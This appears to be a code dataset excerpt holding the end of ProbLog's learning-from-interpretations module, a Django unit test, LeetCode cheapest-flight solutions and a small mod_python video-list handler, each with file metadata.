par_marg[index] != value:\n raise Exception(\n \"Different parent margs for {}={} and previous {}={}\".format(\n fact, value, index, par_marg[index]\n )\n )\n par_marg[index] = value\n for o_index in self._adatomc[index[0]]:\n if o_index >= 0:\n par_marg[(o_index, index[1])] = value\n fact_count[index] += m\n if fact in p_values:\n # # print('fact in p_values', fact)\n k = (index[0], index[1])\n if k not in fact_values:\n fact_values[k] = (self._get_weight(index[0], index[1]), list())\n p_value = p_values[fact]\n fact_values[k][1].append((p_value, value, m))\n for index, value in par_marg.items():\n # print(\"value[{}]={} ({})\".format(index, value, m))\n fact_par[index] += value * m\n try:\n if isinstance(pEvidence, DensityValue):\n pEvidence = pEvidence.value()\n score += math.log(pEvidence)\n except ValueError:\n logger.debug(\"Pr(evidence) == 0.0\")\n # raise ProbLogError('Inconsistent evidence when updating')\n\n update_list = fact_body\n\n # indices_set = set()\n # for index in update_list:\n # indices_set.add(index[0])\n weight_changed = [False] * len(self.names)\n # print(\"Weight_changed List:\", weight_changed)\n for index in update_list:\n k = (index[0], index[1])\n if k in fact_values:\n logger.debug(\n \"Update continuous distribution {}: \".format(index)\n + \", \".join([str(v) for v in fact_values[k]])\n )\n self._set_weight(\n index[0],\n index[1],\n dist_prob_set(\n *fact_values[k], eps=self._eps, weight_changed=weight_changed\n ),\n )\n weight_changed[int(index[0])] = True\n else:\n\n if float(fact_body[index]) == 0.0:\n prob = 0.0\n else:\n # print(fact_par[index])\n temp = dict()\n ids, vars = zip(*list(fact_par.keys()))\n for id in set(ids):\n temp[id] = 0\n for var in set(vars):\n temp[id] += fact_par[(id, var)]\n prob = float(fact_body[index]) / float(temp[index[0]])\n # prob = float(fact_body[index]) / float(fact_par[index])\n logger.debug(\n \"Update probabilistic fact {}: {} / {} = {}\".format(\n index, fact_body[index], fact_par[index], prob\n )\n )\n self._set_weight(\n index[0], index[1], prob, weight_changed=weight_changed\n )\n weight_changed[int(index[0])] = True\n\n if self._enable_normalize:\n self._normalize_weights()\n\n return score\n\n def _normalize_weights(self):\n # TODO: too late here, AD should be taken into account in _update\n # Derivation is sum(all values for var=k) / sum(all values for i sum(all values for var=i))\n # print(\"_adatoms\", self._adatoms)\n\n for available_prob, idx in self._adatoms:\n if len(idx) == 1:\n continue\n keys = set()\n for i in idx:\n for key, val in self.get_weights(i):\n keys.add(key)\n if len(keys) > 1:\n try:\n keys.remove(Term(\"t\"))\n except KeyError:\n pass\n\n keys = list(keys)\n if len(keys) > 1:\n w = 0.0\n for key in keys:\n w += sum(self._get_weight(i, key, strict=False) for i in idx)\n if w != 0:\n n = (\n available_prob / w\n ) # Some part of probability might be taken by non-learnable weights in AD.\n else:\n n = available_prob\n for i in idx:\n self._set_weight(\n i,\n list(self._weights[i].keys())[0],\n self._get_weight(\n i, list(self._weights[i].keys())[0], strict=False\n )\n * n,\n )\n else:\n w = sum(self._get_weight(i, keys[0], strict=False) for i in idx)\n if w != 0:\n n = (\n available_prob / w\n ) # Some part of probability might be taken by non-learnable weights in AD.\n else:\n n = available_prob\n for i in idx:\n self._set_weight(\n i, keys[0], self._get_weight(i, keys[0], strict=False) * n\n )\n\n def step(self):\n self.iteration += 1\n results = self._evaluate_examples()\n 
getLogger(\"problog_lfi\").info(\"Step {}: {}\".format(self.iteration, results))\n return self._update(results)\n\n def get_model(self):\n self.output_mode = True\n lines = []\n for l in self:\n lines.append(\"%s.\" % l)\n lines.append(\"\")\n self.output_mode = False\n return \"\\n\".join(lines)\n\n def run(self):\n self.prepare()\n\n getLogger(\"problog_lfi\").info(\"Weights to learn: %s\" % self.names)\n getLogger(\"problog_lfi\").info(\"Bodies: %s\" % self.bodies)\n getLogger(\"problog_lfi\").info(\"Parents: %s\" % self.parents)\n getLogger(\"problog_lfi\").info(\"Initial weights: %s\" % self._weights)\n delta = 1000\n prev_score = -1e10\n # TODO: isn't this comparing delta i logprob with min_improv in prob?\n while self.iteration < self.max_iter and (delta < 0 or delta > self.min_improv):\n score = self.step()\n getLogger(\"problog_lfi\").info(\n \"Weights after iteration %s: %s\" % (self.iteration, self._weights)\n )\n getLogger(\"problog_lfi\").info(\n \"Score after iteration %s: %s\" % (self.iteration, score)\n )\n delta = score - prev_score\n prev_score = score\n return prev_score\n\n\nclass ExampleSet(object):\n def __init__(self):\n self._examples = {}\n\n def add(self, index, atoms, values, cvalues):\n ex = self._examples.get((atoms, values))\n if ex is None:\n self._examples[(atoms, values)] = Example(index, atoms, values, cvalues)\n else:\n ex.add_index(index, cvalues)\n\n def __iter__(self):\n return iter(self._examples.values())\n\n def __len__(self):\n return len(self._examples)\n\n\nclass Example(object):\n def __init__(self, index, atoms, values, cvalues):\n \"\"\"An example consists of a list of atoms and their corresponding values (True/False).\n Different continuous values are all mapped to True and stored in self.n.\n \"\"\"\n self.atoms = tuple(atoms)\n self.values = tuple(values)\n self.compiled = []\n self.n = {tuple(cvalues): [index]}\n\n def __hash__(self):\n return hash((self.atoms, self.values))\n\n def __eq__(self, other):\n if other is None:\n return False\n return self.atoms == other.atoms and self.values == other.values\n\n def compile(self, lfi, baseprogram):\n ground_program = None # Let the grounder decide\n # print(\"compile grounding:\")\n # print(\"...\")\n # print(\"Grounded Atoms\", self.atoms)\n\n ground_program = ground(\n baseprogram,\n ground_program,\n evidence=list(zip(self.atoms, self.values)),\n propagate_evidence=lfi.propagate_evidence,\n )\n # print(\"...\")\n # # print(ground_program.to_prolog())\n # print(ground_program)\n\n lfi_queries = []\n for i, node, t in ground_program:\n if (\n t == \"atom\"\n and isinstance(node.probability, Term)\n and node.probability.functor == \"lfi\"\n ):\n factargs = ()\n # # print(\"node.identifier\", node.identifier)\n if node.name.functor != \"choice\":\n if node.name.functor == \"lfi_fact\":\n for arg in node.name.args:\n if str(arg.functor) == \"t\":\n factargs = arg.args\n else:\n factargs = node.name.args\n elif type(node.identifier) == tuple:\n factargs = node.identifier[1]\n # fact = Term('lfi_fact', node.probability.args[0], node.probability.args[1], *factargs)\n # fact = Term('lfi_fact', node.probability.args[0], node.probability.args[1])\n fact = Term(\"lfi_fact\", node.probability.args[0], Term(\"t\", *factargs))\n # print(\"Adding query: \", fact, i)\n ground_program.add_query(fact, i)\n\n # tmp_body = Term('lfi_body', node.probability.args[0], node.probability.args[1], *factargs)\n # tmp_body = Term('lfi_body', node.probability.args[0], node.probability.args[1])\n tmp_body = Term(\n 
\"lfi_body\", node.probability.args[0], Term(\"t\", *factargs)\n )\n lfi_queries.append(tmp_body)\n # print(\"Adding query: \", tmp_body, i)\n # tmp_par = Term('lfi_par', node.probability.args[0], node.probability.args[1], *factargs)\n # tmp_par = Term('lfi_par', node.probability.args[0], node.probability.args[1])\n tmp_par = Term(\n \"lfi_par\", node.probability.args[0], Term(\"t\", *factargs)\n )\n lfi_queries.append(tmp_par)\n # print(\"Adding query: \", tmp_par, i)\n elif (\n t == \"atom\"\n and isinstance(node.probability, Term)\n and node.probability.functor == \"clfi\"\n ):\n factargs = ()\n if type(node.identifier) == tuple:\n factargs = node.identifier[1]\n # fact = Term('clfi_fact', node.probability.args[0], node.probability.args[1], *factargs)\n # fact = Term('clfi_fact', node.probability.args[0], node.probability.args[1])\n fact = Term(\"clfi_fact\", node.probability.args[0], Term(\"t\", *factargs))\n ground_program.add_query(fact, i)\n elif t == \"atom\":\n # TODO: check if non-lfi and continuous and save locations to replace later\n # lfi continuous probs are associated with lfi/2\n pass\n\n ground_program = ground(\n baseprogram,\n ground_program,\n evidence=list(zip(self.atoms, self.values)),\n propagate_evidence=lfi.propagate_evidence,\n queries=lfi_queries,\n )\n # print(\"New ground_program\")\n # print(ground_program)\n\n self.compiled = lfi.knowledge.create_from(ground_program)\n # print(\"Compiled program:\")\n # print(\"\\t\" + self.compiled.to_prolog().replace(\"\\n\", \"\\n\\t\"))\n\n def add_index(self, index, cvalues):\n k = tuple(cvalues)\n if k in self.n:\n self.n[k].append(index)\n else:\n self.n[k] = [index]\n\n\nclass ExampleEvaluator(SemiringDensity):\n def __init__(self, weights, eps):\n SemiringDensity.__init__(self)\n self._weights = weights\n self._cevidence = None\n self._eps = eps\n\n def _get_weight(self, index, args, strict=True):\n index = int(index)\n weight = self._weights[index]\n if isinstance(weight, dict):\n if strict:\n return weight[args]\n else:\n return weight.get(args)\n else:\n return weight\n\n def _get_cweight(self, index, args, atom, strict=True):\n # TODO: Should we cache this? 
This method is called multiple times with the same arguments\n index = int(index)\n dist = self._weights[index]\n if isinstance(dist, dict):\n if strict:\n dist = dist[args]\n else:\n raise ProbLogError(\n \"Continuous distribution is not available for {}, {}\".format(\n index, args\n )\n )\n if not isinstance(dist, Term):\n raise ProbLogError(\n \"Expected a continuous distribution, got {}\".format(dist)\n )\n value = self._cevidence.get(atom)\n if value is not None:\n p = dist_prob(dist, value, eps=self._eps)\n else:\n raise ProbLogError(\"Expected continuous evidence for {}\")\n return p\n\n def is_dsp(self):\n \"\"\"Indicates whether this semiring requires solving a disjoint sum problem.\"\"\"\n return True\n\n def in_domain(self, a):\n return True # TODO implement\n\n def value(self, a):\n \"\"\"Overrides from SemiringProbability.\n Replaces a weight of the form ``lfi(i, t(...))`` by its current estimated value.\n Other weights are passed through unchanged.\n :param a: term representing the weight\n :type a: Term\n :return: current weight\n :rtype: float\n \"\"\"\n if isinstance(a, Term) and a.functor == \"lfi\":\n # index = int(a.args[0])\n return self._get_weight(*a.args)\n elif isinstance(a, Term) and a.functor == \"clfi\":\n return self._get_cweight(*a.args)\n else:\n return float(a)\n\n def __call__(self, example):\n # print(\"__call__\")\n \"\"\"Evaluate the model with its current estimates for all examples.\"\"\"\n # # print('=========>>>')\n at = example.atoms\n val = example.values\n comp = example.compiled\n results = []\n for cval, n in example.n.items():\n results.append(self._call_internal(at, val, cval, comp, n))\n # # print('<<<=========')\n # print(\"__call__.results = \", results)\n return results\n\n def _call_internal(self, at, val, cval, comp, n):\n # print(\"__call_internal__\")\n # # print('=========')\n # # print('ExampleEvaluator.__call__({},{},{},{})'.format(n, at, val, cval))\n # # print('_weights: ', self._weights)\n evidence = {}\n self._cevidence = {}\n # p_values = {}\n for a, v, cv in zip(at, val, cval):\n if a in evidence:\n if cv is not None:\n if self._cevidence[a] != cv:\n context = \" (found evidence({},{}) and evidence({},{}) in example {})\".format(\n a,\n evidence[a],\n a,\n cv,\n \",\".join([str(ni) for ni in n])\n if isinstance(n, list)\n else n + 1,\n )\n raise InconsistentEvidenceError(source=a, context=context)\n if evidence[a] != v:\n context = \" (found evidence({},{}) and evidence({},{}) in example {})\".format(\n a,\n evidence[a],\n a,\n v,\n \",\".join([str(ni) for ni in n])\n if isinstance(n, list)\n else n + 1,\n )\n raise InconsistentEvidenceError(source=a, context=context)\n else:\n if cv is not None:\n self._cevidence[a] = cv\n evidence[a] = v\n\n p_values = {}\n # TODO: this loop is not required if there are no clfi_facts\n for idx, node, ty in comp:\n if ty == \"atom\":\n name = node.name\n if (\n name is not None and name.functor == \"clfi_fact\"\n ): # TODO: when is this wrapped in 'choice'? 
Before compilation?\n clfi = node.probability\n ev_atom = clfi.args[2]\n value = self._cevidence.get(ev_atom)\n if value is not None:\n p_values[node.name] = value\n\n try:\n # TODO: The next step generates the entire formula if it is density and this is redone later (caching?)\n evaluator = comp.get_evaluator(semiring=self, evidence=evidence)\n except InconsistentEvidenceError as err:\n n = \",\".join([str(ni + 1) for ni in n]) if isinstance(n, list) else n + 1\n context = err.context + \" (example {})\".format(n)\n raise InconsistentEvidenceError(err.source, context)\n\n p_queries = {}\n # Probability of query given evidence\n for name, node, label in evaluator.formula.labeled():\n if name.functor not in [\"lfi_body\", \"lfi_par\"]:\n continue\n # print(\"evaluate start {}\".format(name), node)\n w = evaluator.evaluate(node)\n # print(\"evaluate {}: {} ({})\".format(name, w, len(n)))\n # w = evaluator.evaluate_fact(node)\n # print (\"WWW\", w, w1, w2)\n if isinstance(w, DensityValue):\n # # print(\"{} => {}\".format(w, float(w)))\n # w = float(w)\n p_queries[name] = w\n elif w < 1e-6: # TODO: too high for multivariate dists?\n p_queries[name] = 0.0\n else:\n p_queries[name] = w\n # print(\"_call_internal.evaluate_evidence\")\n p_evidence = evaluator.evaluate_evidence()\n # print(\"_call_internal.result\", p_evidence, \"\\n\", p_queries, \"\\n\\n \".join([str(v) for v in p_values.items()]),)\n\n return len(n), p_evidence, p_queries, p_values\n\n\nclass ExampleEvaluatorLog(SemiringLogProbability):\n def __init__(self, weights, eps):\n SemiringLogProbability.__init__(self)\n self._weights = weights\n self._cevidence = None\n self._eps = eps\n\n def _get_weight(self, index, args, strict=True):\n index = int(index)\n weight = self._weights[index]\n if isinstance(weight, dict):\n if strict:\n weight = weight[args]\n else:\n weight = weight.get(args, 0.0)\n try:\n result = math.log(weight)\n except ValueError:\n return float(\"-inf\")\n return result\n\n def _get_cweight(self, index, args, atom, strict=True):\n # TODO: Should we cache this? 
This method is called multiple times with the same arguments\n index = int(index)\n dist = self._weights[index]\n if isinstance(dist, dict):\n if strict:\n dist = dist[args]\n else:\n raise ProbLogError(\n \"Continuous distribution is not available for {}, {}\".format(\n index, args\n )\n )\n if not isinstance(dist, Term):\n raise ProbLogError(\n \"Expected a continuous distribution, got {}\".format(dist)\n )\n value = self._cevidence.get(atom)\n if value is not None:\n p = dist_prob(dist, value, log=True, eps=self._eps)\n else:\n raise ProbLogError(\"Expected continuous evidence for {}\")\n return p\n\n def value(self, a):\n \"\"\"Overrides from SemiringProbability.\n Replaces a weight of the form ``lfi(i, t(...))`` by its current estimated value.\n Other weights are passed through unchanged.\n :param a: term representing the weight\n :type a: Term\n :return: current weight\n :rtype: float\n \"\"\"\n if isinstance(a, Term) and a.functor == \"lfi\":\n # index = int(a.args[0])\n rval = self._get_weight(*a.args)\n elif isinstance(a, Term) and a.functor == \"clfi\":\n rval = self._get_cweight(*a.args)\n else:\n rval = math.log(float(a))\n return rval\n\n def __call__(self, example):\n \"\"\"Evaluate the model with its current estimates for all examples.\"\"\"\n # # print('=========>>>')\n at = example.atoms\n val = example.values\n comp = example.compiled\n results = []\n for cval, n in example.n.items():\n results.append(self._call_internal(at, val, cval, comp, n))\n # # print('<<<=========')\n return results\n\n def _call_internal(self, at, val, cval, comp, n):\n # # print('=========')\n # # print('ExampleEvaluator.__call__({},{},{},{})'.format(n, at, val, cval))\n # # print('_weights: ', self._weights)\n evidence = {}\n self._cevidence = {}\n # p_values = {}\n for a, v, cv in zip(at, val, cval):\n # # print('__call__', a, v, cv)\n if a in evidence:\n if cv is not None:\n if self._cevidence[a] != cv:\n context = \" (found evidence({},{}) and evidence({},{}) in example {})\".format(\n a,\n evidence[a],\n a,\n cv,\n \",\".join([str(ni) for ni in n])\n if isinstance(n, list)\n else n + 1,\n )\n raise InconsistentEvidenceError(source=a, context=context)\n if evidence[a] != v:\n context = \" (found evidence({},{}) and evidence({},{}) in example {})\".format(\n a,\n evidence[a],\n a,\n v,\n \",\".join([str(ni) for ni in n])\n if isinstance(n, list)\n else n + 1,\n )\n raise InconsistentEvidenceError(source=a, context=context)\n else:\n if cv is not None:\n self._cevidence[a] = cv\n evidence[a] = v\n\n p_values = {}\n # TODO: this loop is not required if there are no clfi_facts\n for idx, node, ty in comp:\n if ty == \"atom\":\n name = node.name\n # TODO: when is this wrapped in 'choice'? 
Before compilation?\n if name is not None and name.functor == \"clfi_fact\":\n clfi = node.probability\n ev_atom = clfi.args[2]\n value = self._cevidence.get(ev_atom)\n if value is not None:\n p_values[node.name] = value\n\n try:\n evaluator = comp.get_evaluator(semiring=self, evidence=evidence)\n except InconsistentEvidenceError as err:\n n = \",\".join([str(ni + 1) for ni in n]) if isinstance(n, list) else n + 1\n context = err.context + \" (example {})\".format(n)\n raise InconsistentEvidenceError(err.source, context)\n\n p_queries = {}\n # Probability of query given evidence\n for name, node, label in evaluator.formula.labeled():\n w = evaluator.evaluate_fact(node)\n # if w < 1e-6: # TODO: too high for multivariate dists\n # # print('Set w to 0: ', w)\n # p_queries[name] = 0.0\n # else:\n p_queries[name] = w\n # TODO: p_evidence becomes too small for many continuous observations\n p_evidence = evaluator.evaluate_evidence()\n # # print('__call__.result', p_evidence, '\\n', p_queries, '\\n', '\\n '.join([str(v) for v in p_values.items()]))\n return len(n), p_evidence, p_queries, p_values\n\n\ndef extract_evidence(pl):\n engine = DefaultEngine()\n atoms = engine.query(pl, Term(\"evidence\", None, None))\n atoms1 = engine.query(pl, Term(\"evidence\", None))\n atoms2 = engine.query(pl, Term(\"observe\", None))\n for atom in atoms1 + atoms2:\n atom = atom[0]\n if atom.is_negated():\n atoms.append((-atom, Term(\"false\")))\n else:\n atoms.append((atom, Term(\"true\")))\n result = []\n for at, vl in atoms:\n vlr = str2bool(vl)\n vlv = None\n if vlr is None: # TODO: also check that atom is a continuous distribution\n vlr, vlv = str2num(vl)\n result.append((at, vlr, vlv))\n # return [(at, str2bool(vl)) for at, vl in atoms]\n return result\n\n\ndef read_examples(*filenames):\n for filename in filenames:\n engine = DefaultEngine()\n\n with open(filename) as f:\n example = \"\"\n for line in f:\n if line.strip().startswith(\"---\"):\n pl = PrologString(example)\n atoms = extract_evidence(pl)\n if len(atoms) > 0:\n yield atoms\n example = \"\"\n else:\n example += line\n if example:\n pl = PrologString(example)\n atoms = extract_evidence(pl)\n if len(atoms) > 0:\n yield atoms\n\n\nclass DefaultDict(object):\n def __init__(self, base):\n self.base = base\n\n def __getitem__(self, key):\n return self.base.get(key, Var(key))\n\n\ndef run_lfi(program, examples, output_model=None, **kwdargs):\n lfi = LFIProblem(program, examples, **kwdargs)\n score = lfi.run()\n\n if output_model is not None:\n with open(output_model, \"w\") as f:\n f.write(lfi.get_model())\n\n names = []\n weights = []\n for i, name in enumerate(lfi.names):\n weights_i = lfi.get_weights(i)\n for w_args, w_val in weights_i:\n translate = {k: v for k, v in zip(name.probability.args[1:], w_args.args)}\n names.append(name.apply(DefaultDict(translate)))\n weights.append(w_val)\n\n return score, weights, names, lfi.iteration, lfi\n\n\ndef argparser():\n import argparse\n\n parser = argparse.ArgumentParser(\n description=\"Learning from interpretations with ProbLog\"\n )\n parser.add_argument(\"model\")\n parser.add_argument(\"examples\", nargs=\"+\")\n parser.add_argument(\"-n\", dest=\"max_iter\", default=10000, type=int)\n parser.add_argument(\"-d\", dest=\"min_improv\", default=1e-10, type=float)\n parser.add_argument(\n \"-o\",\n \"--output-model\",\n type=str,\n default=None,\n help=\"write resulting model to given file\",\n )\n parser.add_argument(\"--logger\", type=str, default=None, help=\"write log to file\")\n parser.add_argument(\n 
\"-k\",\n \"--knowledge\",\n dest=\"koption\",\n choices=get_evaluatables(),\n default=None,\n help=\"knowledge compilation tool\",\n )\n parser.add_argument(\n \"-l\",\n \"--leak-probabilities\",\n dest=\"leakprob\",\n type=float,\n help=\"Add leak probabilities for evidence atoms.\",\n )\n parser.add_argument(\n \"--propagate-evidence\",\n action=\"store_true\",\n dest=\"propagate_evidence\",\n default=True,\n help=\"Enable evidence propagation\",\n )\n parser.add_argument(\n \"--dont-propagate-evidence\",\n action=\"store_false\",\n dest=\"propagate_evidence\",\n default=True,\n help=\"Disable evidence propagation\",\n )\n parser.add_argument(\n \"--eps\",\n type=float,\n default=1e-4,\n help=\"Smallest difference between continuous values (default 1e-4)\",\n )\n normalize_group = parser.add_mutually_exclusive_group()\n normalize_group.add_argument(\n \"--normalize\",\n action=\"store_true\",\n dest=\"normalize\",\n default=True,\n help=\"Normalize AD-weights (default).\",\n )\n normalize_group.add_argument(\n \"--nonormalize\",\n action=\"store_false\",\n dest=\"normalize\",\n help=\"Do not normalize AD-weights.\",\n )\n parser.add_argument(\"-v\", \"--verbose\", action=\"count\", default=0)\n parser.add_argument(\"--web\", action=\"store_true\", help=argparse.SUPPRESS)\n parser.add_argument(\n \"-a\",\n \"--arg\",\n dest=\"args\",\n action=\"append\",\n help=\"Pass additional arguments to the cmd_args builtin.\",\n )\n\n return parser\n\n\ndef create_logger(name, verbose):\n levels = [logging.WARNING, logging.INFO, logging.DEBUG] + list(range(9, 0, -1))\n verbose = max(0, min(len(levels) - 1, verbose))\n logger = getLogger(name)\n ch = logging.StreamHandler(sys.stdout)\n formatter = logging.Formatter(\"[%(levelname)s] %(message)s\")\n ch.setFormatter(formatter)\n logger.addHandler(ch)\n logger.setLevel(levels[verbose])\n\n\ndef lfi_wrapper(plfile, evfiles, knowledge, options):\n program = PrologFile(plfile)\n examples = list(read_examples(*evfiles))\n return run_lfi(program, examples, knowledge=get_evaluatable(knowledge), **options)\n\n\ndef main(argv, result_handler=None):\n parser = argparser()\n args = parser.parse_args(argv)\n\n if result_handler is None:\n if args.web:\n result_handler = print_result_json\n else:\n result_handler = print_result\n\n knowledge = get_evaluatable(args.koption)\n\n if args.logger is None:\n outf = None\n else:\n outf = open(args.logger, \"w\")\n\n logger = init_logger(verbose=args.verbose, name=\"problog_lfi\", out=outf)\n create_logger(\"problog\", args.verbose - 1)\n\n program = PrologFile(args.model)\n examples = list(read_examples(*args.examples))\n if len(examples) == 0:\n logger.warning(\"no examples specified\")\n else:\n logger.info(\"Number of examples: %s\" % len(examples))\n options = vars(args)\n del options[\"examples\"]\n\n try:\n results = run_lfi(program, examples, knowledge=knowledge, **options)\n\n for n in results[2]:\n n.loc = program.lineno(n.location)\n retcode = result_handler((True, results), output=outf)\n except Exception as err:\n trace = traceback.format_exc()\n err.trace = trace\n retcode = result_handler((False, err), output=outf)\n\n if args.logger is not None:\n outf.close()\n\n if retcode:\n sys.exit(retcode)\n\n\ndef print_result(d, output, precision=8):\n success, d = d\n if success:\n score, weights, names, iterations, lfi = d\n weights_print = []\n for weight in weights:\n if isinstance(weight, Term) and weight.functor in cdist_names:\n weights_print.append(weight)\n else:\n 
weights_print.append(round(float(weight), precision))\n # print(score, weights, names, iterations, file=output)\n return 0\n else:\n # print(process_error(d), file=output)\n return 1\n\n\ndef print_result_json(d, output, precision=8):\n import json\n\n success, d = d\n if success:\n score, weights, names, iterations, lfi = d\n results = {\n \"SUCCESS\": True,\n \"score\": score,\n \"iterations\": iterations,\n \"weights\": [\n [str(n), round(w, precision), n.loc[1], n.loc[2]]\n for n, w in zip(names, weights)\n ],\n \"model\": lfi.get_model(),\n }\n # print(json.dumps(results), file=output)\n else:\n results = {\"SUCCESS\": False, \"err\": vars(d)}\n # print(json.dumps(results), file=output)\n return 0\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n","sub_path":"problog/learning/lfi.py","file_name":"lfi.py","file_ext":"py","file_size_in_byte":80764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"222616294","text":"from django.test.testcases import TestCase\nfrom SuiSiannAdminApp.models import 句表\nfrom SuiSiannAdminApp.management.提原始漢羅kah漢羅 import 提原始漢羅kah漢羅\n\n\nclass 提原始漢羅kah漢羅單元試驗(TestCase):\n def test_提兩筆(self):\n 句1 = 句表.objects.create(\n 原始漢字=\"媠姑娘\",\n 原始臺羅=\"suí koo-niû\",\n 漢字=\"媠\",\n 臺羅=\"suí\"\n )\n pk1 = str(句1.pk)\n 句2 = 句表.objects.create(\n 原始漢字=\"豬\",\n 原始臺羅=\"ti\",\n 漢字=\"豬仔\",\n 臺羅=\"ti-á\"\n )\n pk2 = str(句2.pk)\n self.assertEqual(提原始漢羅kah漢羅(), (\n [\n pk1, \"媠姑娘\", \"suí koo-niû\", pk2, \"豬\", \"ti\",\n ], [\n pk1, \"媠\", \"suí\", pk2, \"豬仔\", \"ti-á\",\n ],\n ))\n","sub_path":"tests/SuiSiannAdminApp/management/test提原始漢羅kah漢羅單元試驗.py","file_name":"test提原始漢羅kah漢羅單元試驗.py","file_ext":"py","file_size_in_byte":904,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"359391851","text":"class Solution(object):\n ## TLE\n def findCheapestPrice(self, n, flights, src, dst, k):\n \"\"\"\n :type n: int\n :type flights: List[List[int]]\n :type src: int\n :type dst: int\n :type K: int\n :rtype: int\n \"\"\"\n from collections import defaultdict\n # flights.sort()\n # flights.p()\n dst_dict = defaultdict(list)\n n = len(flights)\n for s, d, p in flights:\n dst_dict[s] += (d, p),\n visited = set()\n # res = [float('inf')]\n # mem = {}\n def dfs(src, stop_n, cur_p):\n # (src, stop_n, cur_p).p()\n # if (src,stop_n) in mem: return mem[(src,stop_n)]\n if stop_n > k: return float('inf')\n res_list = []\n for d, p in dst_dict[src]:\n if d in visited:\n continue\n visited.add(d)\n np = cur_p + p\n if d == dst:\n res_list += np,\n else:\n res_list += dfs(d, stop_n+1, np),\n visited.discard(d)\n res = min(res_list) if res_list else float('inf')\n # if (src,stop_n) in mem:\n # res = min(mem[(src,stop_n)], res) \n # mem[(src,stop_n)] = res\n return res\n visited.add(src) \n res = dfs(src, 0, 0)\n if res == float('inf'): return -1\n return res\n\nclass Solution(object):\n # https://en.wikipedia.org/wiki/Dijkstra%27s_algorithm\n def findCheapestPrice(self, n, flights, src, dst, k):\n \"\"\"\n :type n: int\n :type flights: List[List[int]]\n :type src: int\n :type dst: int\n :type K: int\n :rtype: int\n \"\"\"\n from collections import defaultdict\n from heapq import heappop, heappush\n dst_dict = defaultdict(set)\n visited = set()\n for s, d, p in flights:\n dst_dict[s].add((d,p))\n q = []\n heappush(q,(0, src, k+1))\n visited.add(src)\n while q:\n sum_p, s, count = heappop(q)\n visited.add(s)\n if s == dst: return sum_p\n if count > 0:\n for d, p in dst_dict[s]:\n if d not in 
visited:\n heappush(q, (sum_p+p, d, count-1))\n return -1\n\n\n\n\n\n\nif __name__ == '__main__':\n from minitest import *\n\n with test(\"Solution\"):\n Solution().findCheapestPrice(3,\n [[0,1,100],[1,2,100],[0,2,500]],\n 0,2,1).must_equal(200)\n Solution().findCheapestPrice(3,\n [[0,1,100],[1,2,100],[0,2,500]],\n 0,2,0).must_equal(500)\n Solution().findCheapestPrice(5,\n [[4,1,1],[1,2,3],[0,3,2],[0,4,10],[3,1,1],[1,4,3]],\n 2,1,1).must_equal(-1)\n Solution().findCheapestPrice(10,\n [[3,4,4],[2,5,6],[4,7,10],[9,6,5],[7,4,4],[6,2,10],[6,8,6],[7,9,4],[1,5,4],[1,0,4],[9,7,3],[7,0,5],[6,5,8],[1,7,6],[4,0,9],[5,9,1],[8,7,3],[1,2,6],[4,1,5],[5,2,4],[1,9,1],[7,8,10],[0,4,2],[7,2,8]],\n 6,0,7).must_equal(14)\n","sub_path":"python/leetcode/graph/787_Cheapest_Flights_Within_K_Stops.py","file_name":"787_Cheapest_Flights_Within_K_Stops.py","file_ext":"py","file_size_in_byte":3144,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"6681671","text":"# coding=utf-8\n\n# Copyright (C) 2015 Daniel Schäfer \n#\n# Permission is hereby granted, free of charge, to any person\n# obtaining a copy of this software and associated documentation\n# files (the \"Software\"), to deal in the Software without\n# restriction, including without limitation the rights to use,\n# copy, modify, merge, publish, distribute, sublicense, and/or\n# sell copies of the Software, and to permit persons to whom\n# the Software is furnished to do so, subject to the following\n# conditions:\n#\n# The above copyright notice and this permission notice shall be\n# included in all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND,\n# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE\n# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR\n# PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE AUTHORS\n# OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR\n# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR\n# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE\n# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\nfrom mod_python import apache\nfrom mod_python import util\nimport pkgutil\nfrom handler import Handler\nfrom fetcher import InputDataIncorrect\n\ndef index(req):\n req.content_type = \"text/html\"\n start(req)\n return\n\ndef check_packages(req):\n modules = pkgutil.iter_modules()\n for each in modules:\n req.write(each[1] + \"\\n\")\n\ndef start(req):\n form = util.FieldStorage(req)\n directory = 'YOUR_SAVE_FILE_DIRECTORY'\n api_key = 'YOUR_API_KEY'\n username = form.getfirst('user')\n if not username:\n raise InputDataIncorrect('Specify the username with the \\'user\\' GET attribute.')\n\n handling = Handler(directory, api_key, username, 50)\n handling.add_to_watched(form.getfirst('watched'))\n handling.add_video(form.getfirst('add_video'))\n handling.save()\n req.write(handling.build_html())\n\n if not form.getfirst('watched'):\n handling.update_videos()\n req.write('Refresh the page to see new videos.')\n","sub_path":"index_mod_python.py","file_name":"index_mod_python.py","file_ext":"py","file_size_in_byte":2102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
